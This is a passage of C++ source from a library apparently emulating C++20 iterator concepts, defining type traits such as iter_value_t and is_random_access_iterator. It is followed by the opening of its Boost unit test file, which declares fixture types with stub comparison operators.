#endif
}
template< typename F, typename ...Args >
struct is_predicate : public detail::is_predicate< F, detail::lifter< Args... > > {};
SLCE_HELPER( Predicate, is_predicate )
template< typename R, typename T, typename U >
struct is_relation : public std::integral_constant<
bool,
is_predicate< R, T, T >::value &&
is_predicate< R, U, U >::value &&
is_predicate< R, T, U >::value &&
is_predicate< R, U, T >::value
> {};
SLCE_HELPER( Relation, is_relation )
template< typename R, typename T, typename U >
struct is_strict_weak_order : public is_relation< R, T, U > {};
SLCE_HELPER( StrictWeakOrder, is_strict_weak_order )
namespace detail {
template< typename T >
using with_reference = T&;
template< typename T, typename Enable = void >
struct can_reference : public std::false_type {};
template< typename T >
struct can_reference< T, typename voider<
with_reference< T >
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_dereferenceable : public std::false_type {};
template< typename T >
struct is_dereferenceable< T, typename voider<
decltype( *std::declval< T& >() )
>::type > : public can_reference< decltype( *std::declval< T& >() ) > {};
}
#ifdef __cpp_lib_ranges
template< typename T >
using incrementable_traits = std::incrementable_traits< T >;
template< typename T >
using iter_difference_t = std::iter_difference_t< T >;
template< typename T >
using readable_traits = std::readable_traits< T >;
template< typename T >
using iter_value_t = std::iter_value_t< T >;
template< typename T >
using iter_reference_t = std::iter_reference_t< T >;
template< typename T >
using iter_rvalue_reference_t = std::iter_rvalue_reference_t< T >;
#else
namespace detail {
template< typename T, typename Enable = void >
struct has_dereference_type : public std::false_type {};
template< typename T >
struct has_dereference_type< T, typename voider<
typename T::difference_type
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct subtracted_type_is_integral : public std::false_type {};
template< typename T >
struct subtracted_type_is_integral< T, typename voider<
decltype( std::declval< const T& >() - std::declval< const T& >() )
>::type > : public std::is_integral< decltype( std::declval< const T& >() - std::declval< const T& >() ) > {};
template< typename T, typename Enable = void >
struct cond_value_type {};
template< typename T >
struct cond_value_type< T, typename std::enable_if<
std::is_object< T >::value
>::type > {
using value_type = typename std::remove_cv< T >::type;
};
}
template< typename, typename Enable = void >
struct incrementable_traits {};
template< typename T >
struct incrementable_traits< T*, typename std::enable_if<
std::is_object< T >::value &&
!( !detail::has_dereference_type< T >::value &&
detail::subtracted_type_is_integral< T >::value )
>::type > {
using difference_type = ptrdiff_t;
};
template< typename T >
struct incrementable_traits< const T > : incrementable_traits< T > {};
template< typename T >
struct incrementable_traits< T, typename std::enable_if<
detail::has_dereference_type< T >::value
>::type > {
using difference_type = typename T::difference_type;
};
template< typename T >
struct incrementable_traits< T, typename std::enable_if<
!detail::has_dereference_type< T >::value &&
detail::subtracted_type_is_integral< T >::value
>::type > {
using difference_type = std::make_signed_t< decltype( std::declval< T >() - std::declval< T >() ) >;
};
namespace detail {
template< typename T, typename Enable = void >
struct has_iterator_traits_difference_type : public std::false_type {};
template< typename T >
struct has_iterator_traits_difference_type< T, typename detail::voider<
typename std::iterator_traits< T >::difference_type
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct has_incrementable_traits_difference_type : public std::false_type {};
template< typename T >
struct has_incrementable_traits_difference_type< T, typename detail::voider<
typename incrementable_traits< T >::difference_type
>::type > : public std::true_type {};
}
template< typename T, typename Enable = void >
struct iter_difference {};
template< typename T >
struct iter_difference< T, typename std::enable_if<
detail::has_iterator_traits_difference_type< T >::value
>::type > {
using type = typename std::iterator_traits< T >::difference_type;
};
template< typename T >
struct iter_difference< T, typename std::enable_if<
!detail::has_iterator_traits_difference_type< T >::value &&
detail::has_incrementable_traits_difference_type< T >::value
>::type > {
using type = typename incrementable_traits< T >::difference_type;
};
template< typename T >
using iter_difference_t = typename iter_difference< T >::type;
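// Illustrative sanity check for this fallback path: std::iterator_traits provides
// difference_type for pointers, so iter_difference_t resolves to ptrdiff_t.
static_assert( std::is_same< iter_difference_t< int* >, ptrdiff_t >::value,
               "iter_difference_t of a pointer is ptrdiff_t" );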
template< typename T, typename Enable = void >
struct readable_traits {};
template< typename T >
struct readable_traits< T*, void > : public detail::cond_value_type< T > {};
template< typename T >
struct readable_traits< T, typename std::enable_if<
std::is_array< T >::value
>::type > {
  using value_type = typename std::remove_cv< typename std::remove_extent< T >::type >::type;
};
template< typename T >
struct readable_traits< const T, void > : public readable_traits< T > {};
template< typename T >
struct readable_traits< T, typename detail::voider<
typename T::value_type
>::type > : public detail::cond_value_type< typename T::value_type > {};
template< typename T >
struct readable_traits< T, typename detail::voider<
typename T::element_type
>::type > : public detail::cond_value_type< typename T::element_type > {};
namespace detail {
template< typename T, typename Enable = void >
struct has_iterator_traits_value_type : public std::false_type {};
template< typename T >
struct has_iterator_traits_value_type< T, typename detail::voider<
typename std::iterator_traits< T >::value_type
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct has_readable_traits_value_type : public std::false_type {};
template< typename T >
struct has_readable_traits_value_type< T, typename detail::voider<
typename readable_traits< T >::value_type
>::type > : public std::true_type {};
}
template< typename T, typename Enable = void >
struct iter_value {};
template< typename T >
struct iter_value< T, typename std::enable_if<
detail::has_iterator_traits_value_type< T >::value
>::type > {
using type = typename std::iterator_traits< T >::value_type;
};
template< typename T >
struct iter_value< T, typename std::enable_if<
!detail::has_iterator_traits_value_type< T >::value &&
detail::has_readable_traits_value_type< T >::value
>::type > {
using type = typename readable_traits< T >::value_type;
};
template< typename T >
using iter_value_t = typename iter_value< T >::type;
template< typename T, typename Enable = void >
struct iter_reference {};
template< typename T >
struct iter_reference< T, typename std::enable_if<
detail::is_dereferenceable< T >::value
>::type > {
using type = decltype( *std::declval< T& >() );
};
template< typename T >
using iter_reference_t = typename iter_reference< T >::type;
namespace detail {
template< typename T >
auto iter_move_( T iter ) -> decltype( iter_move( std::declval< T >() ) ) {
return iter_move( iter );
}
template< typename T, typename Enable = void >
struct has_specialized_iter_move : public std::false_type {};
template< typename T >
struct has_specialized_iter_move< T, typename detail::voider<
decltype( iter_move_( std::declval< T >() ) )
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct dereferenceable_as_lvalue : public std::false_type {};
template< typename T >
struct dereferenceable_as_lvalue< T, typename std::enable_if<
std::is_lvalue_reference< decltype( *std::declval< T >() ) >::value
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct dereferenceable_as_rvalue : public std::false_type {};
template< typename T >
struct dereferenceable_as_rvalue< T, typename std::enable_if<
!std::is_lvalue_reference< decltype( *std::declval< T >() ) >::value
>::type > : public std::true_type {};
}
namespace range {
template< typename T >
auto iter_move( T iter ) -> typename std::enable_if<
detail::has_specialized_iter_move< T >::value,
decltype( detail::iter_move_( std::declval< T >() ) )
>::type {
return detail::iter_move_( iter );
}
template< typename T >
auto iter_move( T iter ) -> typename std::enable_if<
!detail::has_specialized_iter_move< T >::value &&
detail::dereferenceable_as_lvalue< T >::value,
decltype( std::move( *std::declval< T >() ) )
>::type {
return std::move( *iter );
}
template< typename T >
auto iter_move( T iter ) -> typename std::enable_if<
!detail::has_specialized_iter_move< T >::value &&
detail::dereferenceable_as_rvalue< T >::value,
decltype( *std::declval< T >() )
>::type {
return *iter;
}
}
template< typename T, typename Enable = void >
struct iter_rvalue_reference {};
template< typename T >
struct iter_rvalue_reference< T, typename detail::voider<
decltype( range::iter_move( std::declval< T& >() ) )
>::type > {
using type = decltype( range::iter_move( std::declval< T& >() ) );
};
template< typename T >
using iter_rvalue_reference_t = typename iter_rvalue_reference< T >::type;
#endif
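// Illustrative sanity checks: whichever branch above was taken (std::ranges aliases
// or the hand-rolled fallback), pointers expose the expected associated types.
static_assert( std::is_same< iter_value_t< int* >, int >::value,
               "iter_value_t of int* is int" );
static_assert( std::is_same< iter_reference_t< int* >, int& >::value,
               "iter_reference_t of int* is int&" );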
namespace detail {
template< typename T, typename Enable = void >
struct is_cpp17_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_iterator< T, typename std::enable_if<
is_copyable< T >::value &&
can_reference< decltype( *std::declval< T >() ) >::value &&
is_same< decltype( ++std::declval< T >() ), T& >::value &&
can_reference< decltype( *std::declval< T >()++ ) >::value
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_cpp17_input_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_input_iterator< T, typename voider<
typename std::enable_if<
is_cpp17_iterator< T >::value &&
is_equality_comparable< T >::value &&
is_signed_integral< typename incrementable_traits< T >::difference_type >::value
>::type,
typename incrementable_traits< T >::difference_type,
typename readable_traits< T >::value_type,
typename common_reference<
iter_reference_t< T >&&,
typename readable_traits< T >::value_type&
>::type,
decltype( *std::declval< T >()++ ),
typename common_reference<
decltype( *std::declval< T >()++ )&&,
typename readable_traits< T >::value_type&
>::type
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_cpp17_forward_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_forward_iterator< T, typename std::enable_if<
is_cpp17_input_iterator< T >::value &&
is_constructible< T >::value &&
std::is_lvalue_reference< iter_reference_t< T > >::value &&
is_same<
typename remove_cvref< iter_reference_t< T > >::type,
typename readable_traits< T >::value_type
>::value &&
is_convertible_to< decltype( std::declval< T >()++ ), const T& >::value &&
is_same< decltype( *std::declval< T >()++ ), iter_reference_t< T > >::value
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_cpp17_bidirectional_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_bidirectional_iterator< T, typename std::enable_if<
is_cpp17_forward_iterator< T >::value &&
is_same< decltype( --std::declval< T >() ), T& >::value &&
is_convertible_to< decltype( std::declval< T >()-- ), const T& >::value &&
is_same< decltype( *std::declval< T >()-- ), iter_reference_t< T > >::value
>::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct is_cpp17_random_access_iterator : public std::false_type {};
template< typename T >
struct is_cpp17_random_access_iterator< T, typename std::enable_if<
is_cpp17_bidirectional_iterator< T >::value &&
is_strict_totally_ordered< T >::value &&
is_same< decltype( std::declval< T >() += std::declval< typename incrementable_traits< T >::difference_type >() ), T& >::value &&
is_same< decltype( std::declval< T >() -= std::declval< typename incrementable_traits< T >::difference_type >() ), T& >::value &&
is_same< decltype( std::declval< T >() + std::declval< typename incrementable_traits< T >::difference_type >() ), T >::value &&
is_same< decltype( std::declval< typename incrementable_traits< T >::difference_type >() + std::declval< T >() ), T >::value &&
is_same< decltype( std::declval< T >() - std::declval< typename incrementable_traits< T >::difference_type >() ), T >::value &&
is_same< decltype( std::declval< T >() - std::declval< T >() ), typename incrementable_traits< T >::difference_type >::value &&
is_convertible_to< iter_reference_t< T >, decltype( std::declval< T >()[ std::declval< typename incrementable_traits< T >::difference_type >() ] ) >::value
>::type > : public std::true_type {};
}
template< typename T, typename Enable = void >
struct is_readable : public std::false_type {};
template< typename T >
struct is_readable< T, typename detail::voider<
iter_value_t< T >,
iter_reference_t< T >,
iter_rvalue_reference_t< T >
>::type > : public std::true_type {};
SLCE_HELPER( Readable, is_readable )
template< typename Out, typename T, typename Enable = void >
struct is_writable : public std::false_type {};
template< typename Out, typename T >
struct is_writable< Out, T, typename detail::voider<
//decltype( *std::declval< Out&& >() = std::forward< T >( std::declval< T&& >() ) )//,
decltype( *std::forward< Out >( std::declval< Out&& >() ) = std::forward< T >( std::declval< T&& >() ) ),
decltype( const_cast< const iter_reference_t< Out >&& >( *std::declval< Out&& >() ) =
std::forward< T >( std::declval< T&& >() ) ),
decltype( const_cast< const iter_reference_t< Out >&& >( *std::forward< Out >( std::declval< Out&& >() ) ) =
std::forward< T >( std::declval< T&& >() ) )
>::type > : public std::true_type {};
SLCE_HELPER( Writable, is_writable )
template< typename T, typename Enable = void >
struct is_weakly_incrementable : public std::false_type {};
template< typename T >
struct is_weakly_incrementable< T, typename detail::voider<
typename std::enable_if<
is_semiregular< T >::value &&
is_signed_integral< iter_difference_t< T > >::value &&
is_same< decltype( ++std::declval< T& >() ), T& >::value
>::type,
iter_difference_t< T >,
decltype( std::declval< T& >()++ )
>::type > : public std::true_type {};
SLCE_HELPER( WeaklyIncrementable, is_weakly_incrementable )
template< typename T, typename Enable = void >
struct is_incrementable : public std::false_type {};
template< typename T >
struct is_incrementable< T, typename std::enable_if<
is_regular< T >::value &&
is_weakly_incrementable< T >::value &&
is_same< decltype( std::declval< T& >()++ ), T >::value
>::type > : public std::true_type {};
SLCE_HELPER( Incrementable, is_incrementable )
template< typename T, typename Enable = void >
struct is_iterator : public std::false_type {};
template< typename T >
struct is_iterator< T, typename std::enable_if<
detail::can_reference< decltype( *std::declval< T >() ) >::value &&
is_weakly_incrementable< T >::value
>::type > : public std::true_type {};
SLCE_HELPER( Iterator, is_iterator )
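// Illustrative sanity check: a raw pointer is dereferenceable and weakly
// incrementable, so it satisfies the minimal Iterator trait above (assuming the
// is_signed_integral helper defined earlier accepts ptrdiff_t).
static_assert( is_iterator< int* >::value, "int* is an iterator" );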
template< typename S, typename I, typename Enable = void >
struct is_sentinel : public std::false_type {};
template< typename S, typename I >
struct is_sentinel< S, I, typename std::enable_if<
is_semiregular< S >::value &&
is_iterator< I >::value &&
detail::is_weakly_equality_comparable_with< S, I >::value
>::type > : public std::true_type {};
SLCE_HELPER( Sentinel, is_sentinel )
namespace range {
#if defined(__cpp_lib_ranges) && defined(__cpp_variable_templates)
template< typename S, typename I >
struct disable_sized_sentinel : public std::integral_constant< bool, std::disable_sized_sentinel< S, I > > {};
#else
template< typename S, typename I >
struct disable_sized_sentinel : public std::false_type {};
#endif
}
template< typename S, typename I, typename Enable = void >
struct is_sized_sentinel : public std::false_type {};
template< typename S, typename I >
struct is_sized_sentinel< S, I, typename std::enable_if<
is_sentinel< S, I >::value &&
!range::disable_sized_sentinel< typename std::remove_cv< S >::type, typename std::remove_cv< I >::type >::value &&
is_same< decltype( std::declval< const S& >() - std::declval< const I& >() ), iter_difference_t< I > >::value //&&
//is_same< decltype( std::declval< const I& >() - std::declval< const S& >() ), iter_difference_t< I > >::value
>::type > : public std::true_type {};
SLCE_HELPER( SizedSentinel, is_sized_sentinel )
namespace detail {
template< typename T, typename Enable = void >
struct has_iterator_concept : public std::false_type {};
template< typename T >
struct has_iterator_concept< T, typename voider< typename T::iterator_concept >::type > : public std::true_type {};
template< typename T, typename Enable = void >
struct has_iterator_category : public std::false_type {};
template< typename T >
struct has_iterator_category< T, typename voider< typename T::iterator_category >::type > : public std::true_type {};
  // Note: this trait does not behave exactly like ITER_CONCEPT(I) as described in n4810 section 22.3.4.1-1.
  // Since there is no way to detect the primary template unintrusively, slce's iter_concept simply looks for an iterator concept regardless of whether iterator_traits is the primary template or not.
template< typename T, typename Enable = void >
struct iter_concept {};
template< typename T >
struct iter_concept< T, typename std::enable_if<
has_iterator_concept< std::iterator_traits< T > >::value
>::type > {
using type = typename std::iterator_traits< T >::iterator_concept;
};
template< typename T >
struct iter_concept< T, typename std::enable_if<
!has_iterator_concept< std::iterator_traits< T > >::value &&
has_iterator_concept< T >::value
>::type > {
using type = typename T::iterator_concept;
};
template< typename T >
struct iter_concept< T, typename std::enable_if<
!has_iterator_concept< std::iterator_traits< T > >::value &&
!has_iterator_concept< T >::value &&
has_iterator_category< std::iterator_traits< T > >::value
>::type > {
using type = typename std::iterator_traits< T >::iterator_category;
};
template< typename T >
struct iter_concept< T, typename std::enable_if<
!has_iterator_concept< std::iterator_traits< T > >::value &&
!has_iterator_concept< T >::value &&
!has_iterator_category< std::iterator_traits< T > >::value &&
has_iterator_category< T >::value
>::type > {
using type = typename T::iterator_category;
};
template< typename T >
struct iter_concept< T, typename std::enable_if<
!has_iterator_concept< std::iterator_traits< T > >::value &&
!has_iterator_concept< T >::value &&
!has_iterator_category< std::iterator_traits< T > >::value &&
!has_iterator_category< T >::value &&
is_iterator< T >::value
>::type > {
using type = std::random_access_iterator_tag;
};
}
template< typename T, typename Enable = void >
struct is_input_iterator : public std::false_type {};
template< typename T >
struct is_input_iterator< T, typename std::enable_if<
is_iterator< T >::value &&
is_readable< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, std::input_iterator_tag >::value
>::type > : public std::true_type {};
SLCE_HELPER( InputIterator, is_input_iterator )
template< typename I, typename T, typename Enable = void >
struct is_output_iterator : public std::false_type {};
template< typename I, typename T >
struct is_output_iterator< I, T, typename detail::voider<
typename std::enable_if<
is_iterator< I >::value &&
is_writable< I, T >::value
>::type,
decltype( *std::declval< I& >()++ = std::forward< T >( std::declval< T&& >() ) )
>::type > : public std::true_type {};
SLCE_HELPER( OutputIterator, is_output_iterator )
template< typename T, typename Enable = void >
struct is_forward_iterator : public std::false_type {};
template< typename T >
struct is_forward_iterator< T, typename std::enable_if<
is_input_iterator< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, std::forward_iterator_tag >::value &&
is_incrementable< T >::value &&
is_sentinel< T, T >::value
>::type > : public std::true_type {};
SLCE_HELPER( ForwardIterator, is_forward_iterator )
template< typename T, typename Enable = void >
struct is_bidirectional_iterator : public std::false_type {};
template< typename T >
struct is_bidirectional_iterator< T, typename std::enable_if<
is_forward_iterator< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, std::bidirectional_iterator_tag >::value &&
is_same< decltype( --std::declval< T& >() ), T& >::value &&
is_same< decltype( std::declval< T& >()-- ), T >::value
>::type > : public std::true_type {};
SLCE_HELPER( BidirectionalIterator, is_bidirectional_iterator )
template< typename T, typename Enable = void >
struct is_random_access_iterator : public std::false_type {};
template< typename T >
struct is_random_access_iterator< T, typename std::enable_if<
is_bidirectional_iterator< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, std::random_access_iterator_tag >::value &&
is_strict_totally_ordered< T >::value &&
is_sized_sentinel< T, T >::value &&
is_same< decltype( std::declval< T& >() += std::declval< iter_difference_t< T > >() ), T& >::value &&
is_same< decltype( std::declval< const T& >() + std::declval< iter_difference_t< T > >() ), T >::value &&
is_same< decltype( std::declval< iter_difference_t< T > >() + std::declval< const T& >() ), T >::value &&
is_same< decltype( std::declval< T& >() -= std::declval< iter_difference_t< T > >() ), T& >::value &&
is_same< decltype( std::declval< const T& >() - std::declval< iter_difference_t< T > >() ), T >::value &&
is_same< decltype( std::declval< const T& >()[ std::declval< iter_difference_t< T > >() ] ), iter_reference_t< T > >::value
>::type > : public std::true_type {};
SLCE_HELPER( RandomAccessIterator, is_random_access_iterator )
#ifdef __cpp_lib_ranges
using contiguous_iterator_tag = std::contiguous_iterator_tag;
#else
struct contiguous_iterator_tag : public std::random_access_iterator_tag {};
#endif
template< typename T, typename Enable = void >
struct is_contiguous_iterator : public std::false_type {};
template< typename T >
struct is_contiguous_iterator< T, typename std::enable_if<
is_random_access_iterator< T >::value &&
is_derived_from< typename detail::iter_concept< T >::type, contiguous_iterator_tag >::value &&
std::is_lvalue_reference< iter_reference_t< T > >::value &&
is_same< iter_value_t< T >, typename detail::remove_cvref< iter_reference_t< T > >::type >::value
>::type > : public std::true_type {};
SLCE_HELPER( ContiguousIterator, is_contiguous_iterator )
template< typename In, typename Out, typename Enable = void >
struct is_indirectly_movable : public std::false_type {};
template< typename In, typename Out >
struct is_indirectly_movable< In, Out, typename std::enable_if<
is_readable< In >::value &&
is_writable< Out, iter_rvalue_reference_t< In > >::value
>::type > : public std::true_type {};
SLCE_HELPER( IndirectlyMovable, is_indirectly_movable )
template< typename In, typename Out, typename Enable = void >
struct is_indirectly_movable_storable : public std::false_type {};
template< typename In, typename Out >
struct is_indirectly_movable_storable< In, Out, typename std::enable_if<
is_indirectly_movable< In, Out >::value &&
is_writable< Out, iter_value_t< In > >::value &&
is_constructible< iter_value_t< In >, iter_rvalue_reference_t< In > >::value &&
is_assignable< iter_value_t< In >&, iter_rvalue_reference_t< In > >::value
>::type > : public std::true_type {};
SLCE_HELPER( IndirectlyMovableStorable, is_indirectly_movable_storable )
template< typename In, typename Out, typename Enable = void >
struct is_indirectly_copyable : public std::false_type {};
template< typename In, typename Out >
struct is_indirectly_copyable< In, Out, typename std::enable_if<
is_readable< In >::value &&
is_writable< Out, iter_reference_t< In > >::value
>::type > : public std::true_type {};
SLCE_HELPER( IndirectlyCopyable, is_indirectly_copyable )
template< typename In, typename Out, typename Enable = void >
struct is_indirectly_copyable_storable : public std::false_type {};
template< typename In, typename Out >
struct is_indirectly_copyable_storable< In, Out, typename std::enable_if<
is_indirectly_copyable< In, Out >::value &&
is_writable< Out, iter_value_t< In > >::value &&
is_copyable< iter_value_t< In > >::value &&
is_constructible< iter_value_t< In >, iter_reference_t< In > >::value &&
is_assignable< iter_value_t< In >&, iter_reference_t< In > >::value
>::type > : public std::true_type {};
SLCE_HELPER( IndirectlyCopyableStorable, is_indirectly_copyable_storable )
template< typename I1, typename I2, typename Enable = void >
struct is_indirectly_swappable : public std::false_type {};
#ifdef __cpp_lib_ranges
template< typename I1, typename I2 >
struct is_indirectly_swappable< I1, I2, typename detail::voider<
  typename std::enable_if<
    is_readable< I1 >::value &&
    is_readable< I2 >::value
  >::type,
decltype( std::ranges::iter_swap( std::declval< I1 >(), std::declval< I1 >() ) ),
decltype( std::ranges::iter_swap( std::declval< I2 >(), std::declval< I2 >() ) ),
decltype( std::ranges::iter_swap( std::declval< I1 >(), std::declval< I2 >() ) ),
decltype( std::ranges::iter_swap( std::declval< I2 >(), std::declval< I1 >() ) )
>::type > : public std::true_type {};
#endif
SLCE_HELPER( IndirectlySwappable, is_indirectly_swappable )
/*
namespace detail {
template< typename T >
struct identity {
template< typename T >
constexpr T&& operator()( T &&t ) const noexcept {
return std::forward< T >( t );
}
};
}
template< typename I1, typename I2, typename R, typename P1 = detail::identity, typename P2 = detail::identity, typename Enable = void >
struct is_indirectly_comparable : public std::false_type {};
template< typename I1, typename I2, typename R, typename P1, typename P2 >
struct is_indirectly_comparable< I1, I2, R, P1, P2, typename std::enable_if<
///
>::type > : public std::false_type {};
*/
}
#endif
<|start_filename|>test/slce.cpp<|end_filename|>
/*
* Copyright (c) 2019 <NAME>
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included in all
* copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
* AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
* LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
* OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
* SOFTWARE.
*/
#define BOOST_TEST_MAIN
#include <vector>
#include <boost/test/included/unit_test.hpp>
#include <slce/slce.hpp>
struct base {};
struct inherited : public base {};
struct other {};
struct non_copyable {
non_copyable( const non_copyable& ) = delete;
non_copyable &operator=( const non_copyable& ) = delete;
};
struct copyable {
copyable( const copyable& ) = default;
copyable &operator=( const copyable& ) = default;
};
struct movable {
movable( const movable& ) = delete;
movable( movable&& ) = default;
movable &operator=( const movable& ) = delete;
movable &operator=( movable&& ) = default;
};
struct partially_castable_t1 {};
struct partially_castable_t2 {
partially_castable_t2( const partially_castable_t1& ) {}
partially_castable_t2( partially_castable_t1&& ) {}
partially_castable_t2 &operator=( const partially_castable_t1& ) { return *this; };
partially_castable_t2 &operator=( partially_castable_t1&& ) { return *this; };
operator partially_castable_t1() const { return partially_castable_t1(); }
};
using fully_castable_t1 = inherited;
using fully_castable_t2 = base;
using default_constructible = base;
struct constructible_with_int {
constructible_with_int( int ) {}
};
using destructible = base;
class non_destructible {
~non_destructible() {}
};
struct bool_like {
bool_like( bool ) {}
bool_like( bool_like&& ) {}
bool_like &operator=( bool_like&& ) { return *this; }
bool operator!() const {
return false;
}
operator bool() const {
return true;
}
};
bool operator&&( const bool_like&, bool ) { return true; }
bool operator||( const bool_like&, bool ) { return true; }
bool operator&&( bool, const bool_like& ) { return true; }
bool operator||( bool, const bool_like& ) { return true; }
bool operator&&( const bool_like&, const bool_like& ) { return true; }
bool operator||( const bool_like&, const bool_like& ) { return true; }
bool operator==( const bool_like&, bool ) { return true; }
bool operator!=( const bool_like&, bool ) { return true; }
bool operator==( bool, const bool_like& ) { return true; }
bool operator!=( bool, const bool_like& ) { return true; }
bool operator==( const bool_like&, const bool_like& ) { return true; }
bool operator!=( const bool_like&, const bool_like& ) { return true; }
bool operator&&( const volatile bool_like&, bool ) { return true; }
bool operator||( const volatile bool_like&, bool ) { return true; }
bool operator&&( bool, const volatile bool_like& ) { return true; }
bool operator||( bool, const volatile bool_like& ) { return true; }
bool operator&&( const volatile bool_like&, const volatile bool_like& ) { return true; }
bool operator||( const volatile bool_like&, const volatile bool_like& ) { return true; }
bool operator&&( const bool_like&, const volatile bool_like& ) { return true; }
bool operator||( const bool_like&, const volatile bool_like& ) { return true; }
bool operator&&( const volatile bool_like&, const bool_like& ) { return true; }
bool operator||( const volatile bool_like&, const bool_like& ) { return true; }
bool operator==( const volatile bool_like&, bool ) { return true; }
bool operator!=( const volatile bool_like&, bool ) { return true; }
bool operator==( bool, const volatile bool_like& ) { return true; }
bool operator!=( bool, const volatile bool_like& ) { return true; }
bool operator==( const volatile bool_like&, const volatile bool_like& ) { return true; }
bool operator!=( const volatile bool_like&, const volatile bool_like& ) { return true; }
bool operator==( const bool_like&, const volatile bool_like& ) { return true; }
bool operator!=( const bool_like&, const volatile bool_like& ) { return true; }
bool operator==( const volatile bool_like&, const bool_like& ) { return true; }
bool operator!=( const volatile bool_like&, const bool_like& ) { return true; }
using incomparable = base;
struct comparable {};
struct comparable_inconvertible {};
struct comparable_convertible : public comparable {};
struct partially_comparable {};
bool operator&&( const comparable&, const comparable& ) { return true; }
bool operator&&( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator&&( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator&&( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator&&( const comparable&, const partially_comparable& ) { return true; }
bool operator&&( const partially_comparable&, const comparable& ) { return true; }
bool operator||( const comparable&, const comparable& ) { return true; }
bool operator||( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator||( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator||( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator||( const comparable&, const partially_comparable& ) { return true; }
bool operator||( const partially_comparable&, const comparable& ) { return true; }
bool operator==( const comparable&, const comparable& ) { return true; }
bool operator==( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator==( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator==( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator==( const comparable&, const partially_comparable& ) { return true; }
bool operator==( const partially_comparable&, const comparable& ) { return true; }
bool operator!=( const comparable&, const comparable& ) { return true; }
bool operator!=( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator!=( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator!=( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator!=( const comparable&, const partially_comparable& ) { return true; }
bool operator!=( const partially_comparable&, const comparable& ) { return true; }
bool operator<( const comparable&, const comparable& ) { return true; }
bool operator<( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator<( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator<( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator<( const comparable&, const partially_comparable& ) { return true; }
bool operator<( const partially_comparable&, const comparable& ) { return true; }
bool operator>( const comparable&, const comparable& ) { return true; }
bool operator>( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator>( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator>( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator>( const comparable&, const partially_comparable& ) { return true; }
bool operator>( const partially_comparable&, const comparable& ) { return true; }
bool operator<=( const comparable&, const comparable& ) { return true; }
bool operator<=( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator<=( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator<=( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator<=( const comparable&, const partially_comparable& ) { return true; }
bool operator<=( const partially_comparable&, const comparable& ) { return true; }
bool operator>=( const comparable&, const comparable& ) { return true; }
bool operator>=( const comparable_inconvertible&, const comparable_inconvertible& ) { return true; }
bool operator>=( const comparable&, const comparable_inconvertible& ) { return true; }
bool operator>=( const comparable_inconvertible&, const comparable& ) { return true; }
bool operator>=( const comparable&, const partially_comparable& ) { return true; }
bool operator>=( const partially_comparable&, const comparable& ) { return true; }
bool operator&&( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator&&( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator&&( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator&&( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator&&( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator&&( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator||( const volatile comparable&, const volatile comparable& ) { return true; }
bool operator||( const volatile comparable_inconvertible&, const volatile comparable_inconvertible& ) { return true; }
bool operator||( const volatile comparable&, const volatile comparable_inconvertible& ) { return true; }
bool operator||( const volatile comparable_inconvertible&, const volatile comparable& ) { return true; }
bool operator||( const volatile comparable&, const volatile partially_comparable& ) { return true; }
bool operator||( const volatile partially_comparable&, const volatile comparable& ) { return true; }
bool operator==( const volatile comparable&, const volatile comparable& ) { return true; }
